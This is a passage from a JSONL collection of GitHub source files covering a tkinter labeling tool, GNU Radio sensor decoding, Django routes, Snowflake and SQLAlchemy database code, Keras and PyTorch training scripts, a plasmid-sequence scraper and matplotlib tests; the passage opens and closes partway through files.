paint_size = int(temp.width*ratio), int(temp.height*ratio)\n self._pic_handle = ImageTk.PhotoImage(temp.resize(size=paint_size, resample=Image.BICUBIC)\n )\n self._view.create_image(*bias_center, \n image=self._pic_handle, \n tag='img'\n )\n bias_tl = bias_center[0] - paint_size[0] // 2, \\\n bias_center[1] - paint_size[1] // 2\n if self._axes_on.get():\n self._view.create_line(bias_tl[0], \n bias_center[1], \n bias_tl[0] + paint_size[0], \n bias_center[1], \n fill=BLW._axis_color[self._btn_value[0]], \n width=1, \n arrow='last', \n arrowshape='%d %d %d'%(paint_size[0]//200, paint_size[0]//100, paint_size[0]//200), \n dash=1, \n tag='axis'\n )\n self._view.create_text(bias_tl[0] + paint_size[0], \n bias_center[1], \n text=self._btn_value[0], \n anchor='ne', \n fill='white', \n font=('Arial', max(min(paint_size[0]//40, 15), 10)), \n tag='axis'\n )\n self._view.create_line(bias_center[0], \n bias_tl[1], \n bias_center[0], \n bias_tl[1] + paint_size[1], \n fill=BLW._axis_color[self._btn_value[1]], \n width=1, \n arrow='last', \n arrowshape='%d %d %d'%(paint_size[0]//200, paint_size[0]//100, paint_size[0]//200), \n dash=1, \n tag='axis'\n )\n self._view.create_text(bias_center[0], \n bias_tl[1] + paint_size[1], \n text=self._btn_value[1], \n anchor='se', \n fill='white', \n font=('Arial', max(min(paint_size[0] // 40, 15), 10)), \n tag='axis'\n )\n if raw['mask'] is not None and self._surf_on.get():\n for index, row in raw['mask'].iterrows():\n if row['parent'] in raw['mask'].index:\n self._view.create_line(*tuple([int(ratio * i + j) \n for i, j in zip(row[list(self._btn_value)], bias_tl)\n ]),\n *tuple([int(ratio * i + j) \n for i, j in zip(raw['mask'].loc[row['parent'], list(self._btn_value)], bias_tl)\n ]), \n fill='#fb0', \n width=2, \n tag='mask'\n )\n self._view.create_text(bias_tl, \n text='#%d' % (self._combolist.current()+1), \n fill='white', \n anchor='nw'\n )\n self._repaint_label()\n\n def _repaint_label(self, *arg):\n if len(self._cache) == 0 or self._pic_handle == None:\n return\n self._view.delete('label')\n length = self._pic_handle.width() // 10\n pad = self._pic_handle.width() // 100\n anchor = (self._view.winfo_width() + self._pic_handle.width()) // 2\n if self._radio_var.get() == 'y':\n self._view.create_line(anchor - pad - length, \n pad + length // 2, \n anchor - pad, \n pad + length // 2, \n fill='#0f0', \n tag='label', \n width = pad\n )\n self._view.create_line(anchor - pad - length // 2, \n pad, \n anchor - pad - length // 2, \n pad + length, \n fill='#0f0', \n tag='label', \n width = pad\n )\n elif self._radio_var.get() == 'n':\n self._view.create_line(anchor - pad - length, \n pad + length // 2, \n anchor - pad, \n pad + length // 2, \n fill='#f00', \n tag='label', \n width = pad\n )\n elif self._radio_var.get() == 'na':\n self._view.create_text(anchor - pad, \n -pad, \n text='?', \n anchor='ne', \n font=('Arial', length), \n fill='#ff0', \n tag='label'\n )\n\n def _save_as(self):\n if len(self._cache) == 0:\n return\n path = fd.asksaveasfilename(title='Save Labels As..', \n filetypes=[('CSV file ', '*.csv'), \n ('Excel file', '*.xls;*.xlsx')], \n defaultextension='*.*'\n )\n if type(path) != str or path == '':\n return\n df = pd.DataFrame(np.array([(i, j['label']) \n for i, j in self._cache.items()\n ]), \n columns=['filename', 'label']\n ).set_index('filename')\n if path.endswith('.csv'):\n df.to_csv(path, sep=',')\n elif path.endswith('.xls') or path.endswith('.xlsx'):\n df.to_excel(path)\n\n def _scroll(self, event):\n if len(self._cache) == 0 or \\\n event.widget is self._combolist or \\\n type(event.widget) == str and 'combobox' in event.widget:\n return\n elif event.num == 4 or event.delta == 120:\n self._switch(-1)\n else:\n self._switch(1)\n self._lf_btn_update()\n self._radio_update()\n\n def _set_v3d_path(self):\n temp = fd.askopenfilename(title='Input the Path to a Vaa3D Executable..', initialdir=self._path_v3d)\n if type(temp) != str or temp == '':\n return\n self._path_v3d = temp\n\n def _switch(self, direction):\n if 0 <= self._combolist.current() + direction < len(self._cache):\n self._turn_plane('XY')\n self._combolist.current(min(max(self._combolist.current() + direction, 0), \n len(self._cache) - 1\n )\n )\n self._lf_btn_update()\n self._radio_update()\n\n def _turn_plane(self, plane):\n self._btn_value = plane\n self._btn['XY'].state(['!pressed', '!disabled'])\n self._btn['YZ'].state(['!pressed', '!disabled'])\n self._btn['XZ'].state(['!pressed', '!disabled'])\n self._btn[plane].state(['pressed', 'disabled'])\n self._repaint()\n\nif __name__ == \"__main__\":\n app = BLW()\n app.mainloop()","repo_name":"zzhmark/tip_label_widget","sub_path":"tip_label_widget_class.py","file_name":"tip_label_widget_class.py","file_ext":"py","file_size_in_byte":34258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"30149897811","text":"def solve(n,k,word):\n cur_best = word[0] * k\n for i in range(2,n+1):\n new_word = (word[:i]* (k//i + 1)) [:k]\n if new_word <= cur_best:\n cur_best = new_word\n if new_word[:i] < cur_best[:i]:\n break\n return cur_best\nimport io\nimport os\n# import time\n# a=time.time()\nif __name__ == \"__main__\":\n input = io.BytesIO(os.read(0, os.fstat(0).st_size)).readline\n n,k = [int(x) for x in input().decode().strip().split(\" \")]\n word = input().decode().strip()\n res = solve(n,k,word)\n print(res)\n\n","repo_name":"jano31415/codejam","sub_path":"codeforces/726_round_div2/probe.py","file_name":"probe.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"36856019293","text":"import cv2 as cv \r\nimport matplotlib.pyplot as plt \r\n\r\nimport numpy as np\r\nimport sys\r\n\r\ndef rect(index):\r\n\tdef box(x, y):\r\n\t\treturn index[x][y] and index[x-1][y-1] and index[x-1][y] \\\r\n\t\tand index[x][y-1] and index[x][y+1] and index[x+1][y-1] and index[x+1][y] and index[x+1][y+1]\r\n\t\t\r\n\trow, col = index.shape \r\n\tlr = [row, col]\r\n\tbx = [0, 0]\r\n\t\r\n\tfor x in range(1, row-1):\r\n\t\tfor y in range(1, col-1):\r\n\t\t\tif box(x, y):\r\n\t\t\t\tif x < lr[0]:\r\n\t\t\t\t\tlr[0] = x \r\n\t\t\t\tif y < lr[1]:\r\n\t\t\t\t\tlr[1] = y \r\n\t\t\t\tif x > bx[0]:\r\n\t\t\t\t\tbx[0] = x \r\n\t\t\t\tif y > bx[1]:\r\n\t\t\t\t\tbx [1] = y \r\n\treturn lr, bx \r\n\t\r\nif __name__ == '__main__':\r\n\tif len(sys.argv) != 3:\r\n\t\tprint(\"usage: python extract.py srcImg, dstImg\")\r\n\t\texit(-1)\r\n\t\r\n\tsrcpath = sys.argv[1]\r\n\tdstpath = sys.argv[2]\r\n\t\r\n\tsrcImage = cv.imread(srcpath)\r\n\tif srcImage == np.array([]):\r\n\t\tprint(\" no file \"+srcImg)\r\n\t\texit(-1)\r\n\t\r\n\t#cv.imshow(\"src\", srcImage)\r\n\r\n\thsv = cv.cvtColor(srcImage, cv.COLOR_BGR2HSV)\r\n\r\n\r\n\tth = cv.inRange(hsv, (0, 90, 90), (150, 220, 220))\r\n\r\n\r\n\r\n\tindex = th==255\r\n\r\n\tlr, bx = rect(index)\r\n\r\n\tdstImage = np.zeros((bx[0]-lr[0]+1, bx[1]-lr[1]+1, 3), np.uint8)\r\n\tfor x in range(lr[0], bx[0]):\r\n\t\tfor y in range(lr[1], bx[1]):\r\n\t\t\tdstImage[x-lr[0]][y-lr[1]] = srcImage[x][y]\r\n\r\n#dstImage[:, :] = (255,255,255)\r\n\r\n#dstImage[index] = srcImage[index]\r\n\r\n# cv.imshow(\"dst\", dstImage)\r\n\r\n#print(dstImage.shape)\r\n\r\n\tcv.imwrite(dstpath, dstImage)\r\n\r\n#cv.waitKey(0)\r\n\r\n\tplt.imshow(dstImage)\r\n\tplt.show()\r\n\r\n","repo_name":"sebuaa2019/Team109","sub_path":"RobotSrc/grab_109/src/extractTempl/extract.py","file_name":"extract.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"39768805095","text":"import numpy\nimport pmt\nimport math\nimport struct\nimport time\nfrom gnuradio import gr\nfrom gnuradio import qtgui\n\nfrom PyQt5.QtWidgets import QFrame, QHBoxLayout, QVBoxLayout, QGridLayout, QLabel\nfrom PyQt5.QtGui import QPainter, QBrush, QColor, QPen, QFontMetricsF\nfrom PyQt5.QtCore import Qt as Qtc\nfrom PyQt5.QtCore import QRect\n\nclass DataEvent(object):\n msg_counter = 0\n last_received = round(time.time() * 1000)\n \n def __init__(self, data_b, meta_data_b):\n data = \"\".join(map(lambda n: \"{0:08b}\".format(n), data_b))\n\n self.data = data\n self.meta_data = meta_data_b\n\n temp = int(data[12:24], 2)\n if int(data[12]):\n temp = -1 * (math.pow(2,12) - temp)\n\n self.temp = str(temp / 10.0) \n self.chn = \"--\" \n\n if data[10:12] == \"00\":\n self.chn = \"1\"\n elif data[10:12] == \"01\" :\n self.chn = \"2\"\n elif data[10:12] == \"10\":\n self.chn = \"3\"\n\n if DataEvent.check_crc(data[0:24], data[24:32]):\n self.crc = \"OK\"\n else:\n self.crc = \"BAD\"\n\n if data[9] == \"0\":\n self.auto_tx = 'Yes'\n else:\n self.auto_tx = 'No'\n\n if meta_data_b is not None and len(meta_data_b) == 24:\n self.signal_length = \"%d\" % struct.unpack('L', meta_data_b[0:8])\n self.pulse_length = \"%d\" % struct.unpack('L', meta_data_b[8:16])\n self.signal_length_ms = \"%.3f ms\" % (struct.unpack('f', meta_data_b[16:20])[0] * 1000.0)\n self.pulse_length_ms = \"%.3f ms\" % (struct.unpack('f', meta_data_b[20:24])[0] * 1000.0)\n else:\n self.signal_length = \"--\"\n self.pulse_length = \"--\"\n self.signal_length_ms = \"--\"\n self.pulse_length_ms = \"--\"\n\n if DataEvent.last_received < (round(time.time() * 1000) - 1000):\n DataEvent.msg_counter = 1\n else:\n DataEvent.msg_counter += 1\n\n DataEvent.last_received = (round(time.time() * 1000))\n\n @staticmethod\n def check_crc(data, crc_check, div = '100110001'): \n i=0\n crc=[0] * 8 \n \n data_a = [int(c) for c in data] + ['0'] * 8 \n \n while i/', news_view.NewsDetailView.as_view()),\n \n # ? about\n path('about', info_view.AboutListView.as_view()),\n path('about//', info_view.AboutDetailView.as_view()),\n \n # ? fanfic rool\n path('fanfic-rool', info_view.FanficRoolListView.as_view()),\n path('fanfic-rool//', info_view.FanficRoolDetailView.as_view()),\n \n # ? faq\n path('faq', info_view.FaqListCreateAPIView.as_view()),\n path('faq//', info_view.FaqDetailView.as_view()),\n \n # ? private policy\n path('private-policy', info_view.PrivatyPoliceListView.as_view()),\n path('private-policy/', info_view.PrivatyPoliceDetailView.as_view()),\n]","repo_name":"audiowide/ficcraft","sub_path":"back/base/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"10809881792","text":"import snowflake.connector\nimport sys\nimport time\nimport xlrd\nimport pandas as pd\nfrom sqlalchemy import create_engine\nfrom snowflake.sqlalchemy import URL\n\n#using snowflake connector\ndef connect_snowflake():\n try:\n start = time.time()\n ctx = snowflake.connector.connect(\n user = \"snowflake_user\",\n password = \"password\",\n account = \"snowflake_account\",\n database = \"snowflake_database\",\n warehouse = \"warehouse\",\n schema = \"schema_name\",\n )\n return ctx\n except Exception as e:\n print(\"[SNOWFLAKE ERROR] - Unable to connect to snowflake\")\n print(e)\n sys.exit(1)\n \nctx = connect_snowflake()\ncs = ctx.cursor()\ncount = cs.execute(\"select count(*) from table_name\")\ncs.execute(\"commit\")\ncs.close()\nctx.close()\n\n#another method using sqlalchemy\nengine = create_engine(URL(\n account = \"snowflake_account\",\n user = \"snowflake_user\",\n password = \"password\",\n database = \"snowflake_database\",\n schema = \"schema_name\",\n warehouse = \"warehouse\",\n))\n\ntry:\n connection = engine.connect()\n df = pd.read_excel(filename, sheet_name=\"Sheet1\")\n #chose select columns in DF and also rearrange\n df1 = df.iloc[:,[1,5,4,8,9]]\n #mass insert entire dataframe to snowflake table. if table already exists, ensure column names match with headers in DF\n df1.to_sql(name='TABLE_NAME', con=connection, schema='schema_name', if_exists='append', index=False)\nfinally:\n connection.close()\n engine.dispose()\n","repo_name":"kinipranav/PySnippets","sub_path":"snowflakeConnector.py","file_name":"snowflakeConnector.py","file_ext":"py","file_size_in_byte":1444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"73889680792","text":"from bases.util import type_checking\n\n\nclass RenderError(Exception):\n pass\n\n\nclass BaseToken(object):\n def sub(self, index: int) -> str:\n raise NotImplementedError\n\n def __str__(self) -> str:\n raise NotImplementedError\n\n\nclass Token(BaseToken):\n def sub(self, index: int) -> str:\n raise RenderError\n\n\nclass Function(Token):\n @type_checking\n def sub(self, index: int) -> str:\n raise RenderError\n\n\nclass Operator(BaseToken):\n operator = None # type: str\n precedence = -1 # type: int\n\n @type_checking\n def sub(self, index: int) -> str:\n raise RenderError\n\n\nclass UnaryOp(Operator):\n a = None # type: BaseToken\n\n @type_checking\n def sub(self, index: int) -> str:\n if index not in [0]:\n raise RenderError\n return r'{}'.format(self.a)\n\n @type_checking\n def __str__(self) -> str:\n return r'{}'.format(self.a)\n\n\nclass BinaryOp(Operator):\n a = None # type: BaseToken\n b = None # type: BaseToken\n\n associate = -1 # type: int\n\n @type_checking\n def __str__(self) -> str:\n return r'{} {} {}'.format(self.sub(0), self.operator, self.sub(1))\n\n @type_checking\n def sub(self, index: int) -> str:\n child = [self.a, self.b][index]\n\n if isinstance(child, Operator):\n if child.precedence < self.precedence:\n return r'({})'.format(child)\n if isinstance(child, BinaryOp) and child.precedence == self.precedence:\n if self.associate != index:\n return r'({})'.format(child)\n elif index == 0 and isinstance(child, Function):\n return r'({})'.format(child)\n return r'{}'.format(child)\n\n\nclass TrinaryOp(Operator):\n a = None # type: BaseToken\n b = None # type: BaseToken\n c = None # type: BaseToken\n\n @type_checking\n def __str__(self) -> str:\n return r'{} {} {} {} {} {}'.format(\n self.operator[0], self.sub(0),\n self.operator[1], self.sub(1),\n self.operator[2], self.sub(2))\n\n @type_checking\n def sub(self, index: int) -> str:\n return r'{}'.format([self.a, self.b, self.c][index])\n","repo_name":"speedcell4/CoPL-Py","sub_path":"bases/mixins.py","file_name":"mixins.py","file_ext":"py","file_size_in_byte":2179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"26217534758","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom sqlalchemy import Column, types, ForeignKey\n\nfrom .gtfsbase import GTFSBase\nfrom ..base import Base\nfrom ..mixins import ToJSONMixin, Versioned\n\n\nclass BuildTypes:\n INITIAL_TIMES = 'initial_times'\n FREQUENCY = 'frequency'\n\n\nclass Route(Base, ToJSONMixin, Versioned, GTFSBase):\n __tablename__ = 'routes'\n\n route_id = Column(types.Integer, primary_key=True)\n agency_id = Column(types.Integer, ForeignKey(\"agency.agency_id\",\n onupdate=\"CASCADE\",\n ondelete=\"SET NULL\"))\n route_short_name = Column(types.Text())\n route_long_name = Column(types.String(150))\n route_desc = Column(types.String(150))\n route_type = Column(types.String(50))\n route_color = Column(types.String(50))\n build_type = Column(types.String(50), default=BuildTypes.INITIAL_TIMES)\n route_text_color = Column(types.String(50))\n active = Column(types.Boolean, default=False)\n","repo_name":"avilaton/gtfseditor","sub_path":"app/models/gtfs/route.py","file_name":"route.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"5"} +{"seq_id":"9176344407","text":"import numpy as np\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.models import Sequential\nfrom keras.layers import Dropout, Flatten, Dense\nfrom keras import applications\nfrom keras.utils import to_categorical\nimport matplotlib.pyplot as plt\nimport os\n\nimport tensorflow as tf\nconfig = tf.ConfigProto()\nconfig.gpu_options.allow_growth = True\nsess = tf.Session(config=config)\n\nbatch_size = 20\nepochs = 50\nmonkey_VGG_path = \"monkey_vgg_weighs.h5\"\n\ntrain_data = np.load(\"monkey_feature_train.npy\")\ntrain_labels = np.array([])\nfor i in range(10):\n labels = [i] * 104\n train_labels = np.append(train_labels, labels)\n\ntrain_labels = to_categorical(train_labels)\n\nvalidation_data = np.load(\"monkey_feature_validation.npy\")\nvalidation_labels = np.array([])\nfor i in range(10):\n labels = [i] * 26\n validation_labels = np.append(validation_labels, labels)\n\nvalidation_labels = to_categorical(validation_labels)\n\nmodel = Sequential()\nmodel.add(Flatten(input_shape=train_data.shape[1:]))\nmodel.add(Dense(256, activation='relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(10, activation='softmax'))\n\nmodel.compile(optimizer='rmsprop',\n loss='categorical_crossentropy', metrics=['accuracy'])\n\nhistory = model.fit(train_data, train_labels,\n epochs=epochs,\n batch_size=batch_size,\n validation_data=(validation_data, validation_labels))\nmodel.save_weights(monkey_VGG_path)\n\n# summarize history for accuracy\nplt.plot(history.history['acc'])\nplt.plot(history.history['val_acc'])\nplt.title('model accuracy')\nplt.ylabel('accuracy')\nplt.xlabel('epoch')\nplt.legend(['train', 'validation'], loc='upper left')\nplt.show()\n# summarize history for loss\nplt.plot(history.history['loss'])\nplt.plot(history.history['val_loss'])\nplt.title('model loss')\nplt.ylabel('loss')\nplt.xlabel('epoch')\nplt.legend(['train', 'validation'], loc='upper left')\nplt.show()","repo_name":"xyzhu68/deeplearning","sub_path":"VGG16/train_monkey_features.py","file_name":"train_monkey_features.py","file_ext":"py","file_size_in_byte":1927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"4278416529","text":"# Importing the libraries\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.parallel\nimport torch.optim as optim\nimport torch.utils.data\nfrom torch.autograd import Variable\n\nimport PsicoAnalisis\ncandidatos,matriz = PsicoAnalisis.formatear(('files/Psychometrics.csv'))\n\n\nnb_users = len(matriz)\nnb_candidate = len(matriz[0])\n\n# Feature Scaling\nfrom sklearn.preprocessing import MinMaxScaler\nsc = MinMaxScaler(feature_range = (0, 1))\nmatrizTrain = sc.fit_transform(matriz)\n\n\n# Converting the data into Torch tensors\ntraining_set = torch.FloatTensor(matrizTrain)\n\n# Creating the architecture of the Neural Network\nclass SAE(nn.Module):\n def __init__(self, ):\n super(SAE, self).__init__()\n self.fc1 = nn.Linear(nb_candidate, 10)\n self.fc2 = nn.Linear(10, 5)\n self.fc3 = nn.Linear(5, 10)\n self.fc4 = nn.Linear(10, nb_candidate)\n self.activation = nn.Sigmoid()\n def forward(self, x):\n x = self.activation(self.fc1(x))\n x = self.activation(self.fc2(x))\n x = self.activation(self.fc3(x))\n x = self.fc4(x)\n return x\nsae = SAE()\n\ncriterion = nn.MSELoss()\noptimizer = optim.RMSprop(sae.parameters(), lr = 0.01, weight_decay = 0.5)\n\n# Training the SAE\nnb_epoch = 50\n\nfor epoch in range(1, nb_epoch + 1):\n train_loss = 0\n s = 0.\n for id_user in range(nb_users):\n input = Variable(training_set[id_user]).unsqueeze(0)\n target = input.clone()\n if torch.sum(target.data > 0) > 0:\n output = sae(input)\n target.require_grad = False\n output[target == 0] = 0\n loss = criterion(output, target)\n mean_corrector = nb_candidate/float(torch.sum(target.data > 0) + 1e-10)\n loss.backward()\n train_loss += np.sqrt(loss.data*mean_corrector)\n s += 1.\n optimizer.step()\n print('train loss: '+str(train_loss/s))\n\n \noutputgroup = []\nfor userd_id in range (nb_users):\n user_input = Variable(training_set[userd_id])\n ouput = sae(user_input)\n output = ouput.data.numpy()\n n_max = max(output)\n outputScaling = np.zeros(len(output))\n for i in range (0, len(output)):\n outputScaling[i] = outputScaling[i] + output[i]*(1/n_max)\n \n outputgroup.append(outputScaling)\n\ndef predict(candidatesPath, psytestPath):\n Apruba = np.zeros(nb_users)\n for i in range (len(psytestPath)):\n if (psytestPath[i][0]>= 0.5):\n Apruba[i] += 1 \n \n return Apruba\n\nApruba = predict(candidatos, outputgroup)\nprint(Apruba)\n","repo_name":"topassky/hackaton2020","sub_path":"Reto3.py","file_name":"Reto3.py","file_ext":"py","file_size_in_byte":2559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"26962191223","text":"import glob\n\nimport gpxpy\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.basemap import Basemap\nimport numpy as np\n\nplt.figure(dpi=800)\n# Using resolution='i' for faster runtime. Dealing with the mapping is food for \n# thought, because it's really wasteful to draw the full earth just to look at \n# a 30 km radius.\nm = Basemap(llcrnrlon=24.65 ,llcrnrlat=60.125, urcrnrlon=25.1, urcrnrlat=60.3, projection='merc', resolution='i')\nm.drawcoastlines(linewidth=0.01)\nm.fillcontinents(color='#202020',lake_color='w')\n\n# Read tracks from dir containing all tracks desired to be plotted\ntrack_files = glob.glob(\"tracks/*.GPX\")\ntracks = []\nfor f in track_files:\n with open(f, 'r') as gpx_file:\n gpx = gpxpy.parse(gpx_file)\n for track in gpx.tracks:\n t = []\n for segment in track.segments:\n for point in segment.points:\n t.append((point.latitude, point.longitude))\n tracks.append(t)\n \nfor track in tracks:\n y, x = zip(*track)\n cs = m.plot(x, y, c='aqua', linewidth=0.1, latlon=True)\n\nplt.savefig('running.png')\n","repo_name":"aHertsberg/track-heatmap","sub_path":"plot_heatmap.py","file_name":"plot_heatmap.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"24194789259","text":"\"\"\"\nRECURSIVIDADE\n\nTrata-se de uma técnica de programação pela qual uma função chama a si mesma,\nem uma condição diferente da inicial. O principal objetivo do uso da recursividade\né diminuir a camplexidade de algoritmos.\n\"\"\"\n\ndef fatorial_iter(num):\n \"\"\"\n Calcula o fatorial de um número, usando um algoritmo ITERATIVO (não recursivo)\n \"\"\"\n if num < 0:\n raise Exception(\"ERRO: número negativo, cálculo impossível\")\n \n resposta = 1\n\n for n in range(num, 0, -1):\n resposta *= n\n\n return resposta\n\ndef fatorial_rec(num):\n \"\"\"\n Cálculo de fatorial, usando um algoritmo RECURSIVO\n \"\"\"\n # Não é possível calcular o fatorial de um número negativo\n if num < 0:\n raise Exception(\"ERRO: número negativo, cálculo impossível\")\n \n if num <=1: return 1 # O fatorial de 0 e 1 é = 1\n else: return num * fatorial_rec(num-1) # Chamada recursiva à função\n##############################################################\n\nprint(f\"Fatorial de 6: {fatorial_iter(6)}\")\nprint(f\"Fatorial de 6: {fatorial_rec(6)}\")","repo_name":"EduardoVBF/ed-not-2023-2","sub_path":"10_recursividade.py","file_name":"10_recursividade.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"pt","doc_type":"code","dataset":"github-code","pt":"5"} +{"seq_id":"6780191846","text":"from bs4 import Tag\nfrom enum import Enum\nfrom helpers import build_url\nfrom requests import get\nfrom scrapers.scraper import BaseScraper\nfrom typing import List, Iterator, Tuple, Mapping\n\n\nclass FileType(Enum):\n \"\"\" Represents available sequence filetypes \"\"\"\n SNAPGENE = 'snapgene'\n GENBANK = 'genbank'\n\n\nclass SequenceType(Enum):\n ADDGENE_FULL = 'addgene_full'\n ADDGENE_PARTIAL = 'addgene_partial'\n DEPOSITOR_FULL = 'depositor_full'\n DEPOSITOR_PARTIAL = 'depositor_partial'\n\n\nclass SequenceScraper(BaseScraper):\n \"\"\" Download associated GenBank / SnapGene file from sequences page on plasmid page \"\"\"\n\n def __init__(self, endpoint: str):\n \"\"\" Create scraper class from sequence URL \"\"\"\n super().__init__(build_url(endpoint))\n\n def _is_sequence_page(self) -> bool:\n \"\"\" Helper function to detect if page is for vector sequence data\n\n Returns\n `True` if page contains correct links\n `False` if page is incorrect\n \"\"\"\n if [i for i in _get_files_list(self.soup)]:\n return True\n return False\n\n def get_best(self, filetype: FileType) -> bytes:\n \"\"\" Get best available sequence\n\n Returns\n The best available SnapGene or Genbank file is returned.\n\n See Also\n [`SequenceScraper.best_sequence`]\n \"\"\"\n response = get(self.best_sequence(filetype))\n return response.content\n\n def best_sequence(self, filetype: FileType) -> str:\n \"\"\" Get the link to the best available sequence.\n\n This is the priority of sequence types:\n - depositor's full sequence\n - AddGene's full sequence\n - depositor's partial sequence\n - AddGene's partial sequence\n\n The first sequence of any type is returned\n\n Returns\n The best available sequence is returned\n \"\"\"\n if self._has_full_sequence():\n links = self._full_links(filetype)\n for sequence in (SequenceType.DEPOSITOR_FULL, SequenceType.ADDGENE_FULL):\n if sequence in links.keys():\n # there is usually only one full sequence, but it is still wrapped in an array\n return links[sequence][0]\n else:\n links = self._partial_links(filetype)\n for sequence in (SequenceType.DEPOSITOR_PARTIAL, SequenceType.ADDGENE_PARTIAL):\n if sequence in links.keys():\n # return the first available partial sequence\n return links[sequence][0]\n\n def _has_full_sequence(self) -> bool:\n \"\"\" Check to see if there is a full sequence available.\n\n Returns\n `True` if there are full sequences available\n `False` if there are no full sequences available\n \"\"\"\n # checking both for assurance\n if self._full_links(FileType.GENBANK) == {} and self._full_links(FileType.SNAPGENE) == {}:\n return False\n return True\n\n def _full_links(self, filetype: FileType) -> Mapping[SequenceType, List[str]]:\n # partition HTML sections for full sequences\n # each section represents sequence type. More than one link may be extracted.\n sections = {}\n for _type, section in self._sequence_sections():\n if _type is SequenceType.DEPOSITOR_FULL or _type is SequenceType.ADDGENE_FULL:\n sections[_type] = section\n\n return _extract_links_from_sections(sections, filetype)\n\n def _partial_links(self, filetype: FileType) -> Mapping[SequenceType, List[str]]:\n # partition HTML sections for full sequences\n # each section represents sequence type. More than one link may be extracted.\n sections = {}\n for _type, section in self._sequence_sections():\n if _type is SequenceType.DEPOSITOR_PARTIAL or _type is SequenceType.ADDGENE_PARTIAL:\n sections[_type] = section\n\n return _extract_links_from_sections(sections, filetype)\n\n def _sequence_sections(self) -> Iterator[Tuple[SequenceType, Tag]]:\n terms = [\n ('depositor-full', SequenceType.DEPOSITOR_FULL),\n ('addgene-full', SequenceType.ADDGENE_FULL),\n ('depositor-partial', SequenceType.DEPOSITOR_PARTIAL),\n ('addgene-partial', SequenceType.ADDGENE_PARTIAL),\n ]\n for _id, _type in terms:\n element = self.soup.find('section', attrs={'id': _id})\n if element is not None:\n yield _type, element\n\n def available_sequences(self) -> List[SequenceType]:\n \"\"\" Show available sequence types for given plasmid\n\n Although some plasmids may have more than one partial sequence, only one `SequenceType` is returned\n regardless of the amount of sequences. For example [this plasmid](https://www.addgene.org/45789/sequences/)\n has one full sequence from depositor and 5 partial sequences by AddGene. However, only `[ADDGENE_PARTIAL,\n DEPOSITOR_FULL]` is returned.\n \"\"\"\n available = []\n for _type, element in self._sequence_sections():\n if element is not None:\n available.append(_type)\n return available\n\n\ndef _get_link_from_text(tag: Tag, text: str) -> str:\n \"\"\" Get the link for an anchor element that contains the given text\n\n Example:\n tag = \"
firstsecond\"\n assert _get_link_from_text(tag, 'first') == 'example.com'\n assert _get_link_from_text(tag, 'second') == 'testing.com'\n \"\"\"\n for a in tag.find_all('a'):\n if text in a.text.lower():\n if 'href' in a.attrs.keys():\n return a.attrs['href']\n else:\n raise ValueError('\\'a\\' element has no href')\n raise ValueError(f'No element with \\'{text}\\' found')\n\n\ndef _get_files_list(root: Tag) -> Iterator[Tag]:\n \"\"\" Get file list element.\n\n Returns\n `Tag` with file list element if page has sequence data\n\n Raises\n `ValueError` when downloaded page does not contain 'download-files-list' element\n \"\"\"\n divs = root.find_all('div')\n\n for div in divs:\n if 'id' in div.attrs.keys():\n if 'download-files-list' in div.attrs['id']:\n yield div\n\n\ndef _extract_links_from_sections(sections: Mapping[SequenceType, Tag], filetype: FileType):\n links = {}\n for _type, section in sections.items():\n _section_links = []\n sequences = _get_files_list(section)\n for sequence in sequences:\n _link = _get_link_from_text(sequence, filetype.value)\n _section_links.append(_link)\n links[_type] = _section_links\n\n return links\n","repo_name":"PoorRican/addgene_scraper","sub_path":"scrapers/sequence.py","file_name":"sequence.py","file_ext":"py","file_size_in_byte":6696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"7963937107","text":"import warnings\n\nimport numpy as np\nfrom numpy.testing import assert_array_equal\nimport pytest\n\nimport matplotlib as mpl\nfrom matplotlib.testing.decorators import image_comparison\nimport matplotlib.pyplot as plt\nfrom matplotlib.offsetbox import AnchoredOffsetbox, DrawingArea\nfrom matplotlib.patches import Rectangle\n\n\ndef example_plot(ax, fontsize=12):\n ax.plot([1, 2])\n ax.locator_params(nbins=3)\n ax.set_xlabel('x-label', fontsize=fontsize)\n ax.set_ylabel('y-label', fontsize=fontsize)\n ax.set_title('Title', fontsize=fontsize)\n\n\n@image_comparison(['tight_layout1'], tol=1.9)\ndef test_tight_layout1():\n \"\"\"Test tight_layout for a single subplot.\"\"\"\n fig, ax = plt.subplots()\n example_plot(ax, fontsize=24)\n plt.tight_layout()\n\n\n@image_comparison(['tight_layout2'])\ndef test_tight_layout2():\n \"\"\"Test tight_layout for multiple subplots.\"\"\"\n fig, ((ax1, ax2), (ax3, ax4)) = plt.subplots(nrows=2, ncols=2)\n example_plot(ax1)\n example_plot(ax2)\n example_plot(ax3)\n example_plot(ax4)\n plt.tight_layout()\n\n\n@image_comparison(['tight_layout3'])\ndef test_tight_layout3():\n \"\"\"Test tight_layout for multiple subplots.\"\"\"\n ax1 = plt.subplot(221)\n ax2 = plt.subplot(223)\n ax3 = plt.subplot(122)\n example_plot(ax1)\n example_plot(ax2)\n 